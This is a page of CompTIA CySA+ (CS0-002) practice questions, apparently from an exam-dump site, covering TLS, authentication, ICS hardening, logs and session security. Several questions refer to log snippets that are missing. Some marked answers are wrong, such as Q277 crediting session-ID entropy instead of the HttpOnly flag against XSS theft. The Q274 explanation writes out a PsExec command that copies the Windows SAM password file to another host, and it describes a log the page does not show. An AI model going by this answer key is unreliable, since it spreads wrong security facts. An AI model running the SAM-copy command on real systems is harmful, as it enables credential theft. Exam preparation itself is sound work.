CompTIA CS0-002 Online Practice Questions and Exam Preparation

CompTIA CS0-002 Online Questions & Answers

• Question 271:

  During a review of the vulnerability scan results on a server, an information security analyst notices the following:

  

  The MOST appropriate action for the analyst to recommend to developers is to change the web server so:

  A. It only accepts TLSvl 2
  B. It only accepts cipher suites using AES and SHA
  C. It no longer accepts the vulnerable cipher suites
  D. SSL/TLS is offloaded to a WAF and load balancer
  C. It no longer accepts the vulnerable cipher suites

• Question 272:

  During a quarterly review of user accounts and activity, a security analyst noticed that after a password reset the head of human resources has been logging in from multiple external locations, including several overseas. Further review of the account showed access rights to a number of corporate applications, including a sensitive accounting application used for employee bonuses. Which of the following security methods could be used to mitigate this risk?

  A. RADIUS identity management
  B. Context-based authentication
  C. Privilege escalation restrictions
  D. Elimination of self-service password resets
  B. Context-based authentication

• Question 273:

  Which of the following remediation strategies are MOST effective in reducing the risk of a network-based compromise of embedded ICS? (Select two.)

  A. Patching
  B. NIDS
  C. Segmentation
  D. Disabling unused services
  E. Firewalling
  C. Segmentation
  D. Disabling unused services

• Question 274:

  While reviewing system logs, a network administrator discovers the following entry: Which of the following occurred?

  

  A. An attempt was made to access a remote workstation.
  B. The PsExec services failed to execute.
  C. A remote shell failed to open.
  D. A user was trying to download a password file from a remote system.
  D. A user was trying to download a password file from a remote system.

  ---

  Explanation/Reference:

  The output shows an entry from a system log that indicates a user was trying to download a password file from a remote system using PsExec. PsExec is a command- line tool that allows users to execute processes on remote systems. The entry shows that the user "administrator" tried to run PsExec with the following parameters: \192.168.1.100 - u administrator -p P@ssw0rd -c cmd.exe /c type c:\windows\system32\config\SAM > \192.168.1.101\c$\temp\sam.txt This means that the user tried to connect to the remote system with IP address 192.168.1.100 using the username "administrator" and password "P@ssw0rd", copy cmd.exe to the remote system, and execute it with the command "type c:\windows\system32\config\SAM > \192.168.1.101\c$\temp\sam.txt". This command attempts to read the SAM file, which contains hashed passwords of local users, and write it to a file on another system with IP address 192.168.1.101. References: CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002), page 8; https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

• Question 275:

  A newly appointed Chief Information Security Officer (CISO) has completed a risk assessment review of the organization and wants to reduce the numerous risks that were identified. Which of the following will provide a trend of risk mitigation?

  A. Risk response
  B. Risk analysis
  C. Planning
  D. Oversight
  E. Continuous monitoring
  B. Risk analysis

• Question 276:

  Which of the following factors would determine the regulations placed on data under data sovereignty laws?

  A. What the company intends to do with the data it owns
  B. The company's data security policy
  C. The type of data the company stores
  D. The data laws of the country in which the company is located
  D. The data laws of the country in which the company is located

• Question 277:

  Which of the following session management techniques will help to prevent a session identifier from being stolen via an XSS attack?

  A. Ensuring the session identifier length is sufficient
  B. Creating proper session identifier entropy
  C. Applying a secure attribute on session cookies
  D. Utilizing transport layer encryption on all requests
  E. Implementing session cookies with the HttpOnly flag
  B. Creating proper session identifier entropy

• Question 278:

  A cybersecurity analyst is reviewing Apache logs on a web server and finds that some logs are missing. The analyst has identified that the systems administrator accidentally deleted some log files. Which of the following actions or rules should be implemented to prevent this incident from reoccurring?

  A. Personnel training
  B. Separation of duties
  C. Mandatory vacation
  D. Backup server
  D. Backup server

• Question 279:

  An administrator has been investigating the way in which an actor had been exfiltrating confidential data from a web server to a foreign host. After a thorough forensic review, the administrator determined the server's BIOS had been modified by rootkit installation. After removing the rootkit and flashing the BIOS to a known good state, which of the following would BEST protect against future adversary access to the BIOS, in case another rootkit is installed?

  A. Anti-malware application
  B. Host-based IDS
  C. TPM data sealing
  D. File integrity monitoring
  C. TPM data sealing

• Question 280:

  Given the following log snippet:

  

  Which of the following describes the events that have occurred?

  A. An attempt to make an SSH connection from "superman" was done using a password.
  B. An attempt to make an SSH connection from 192.168.1.166 was done using PKI.
  C. An attempt to make an SSH connection from outside the network was done using PKI.
  D. An attempt to make an SSH connection from an unknown IP address was done using a password.
  B. An attempt to make an SSH connection from 192.168.1.166 was done using PKI.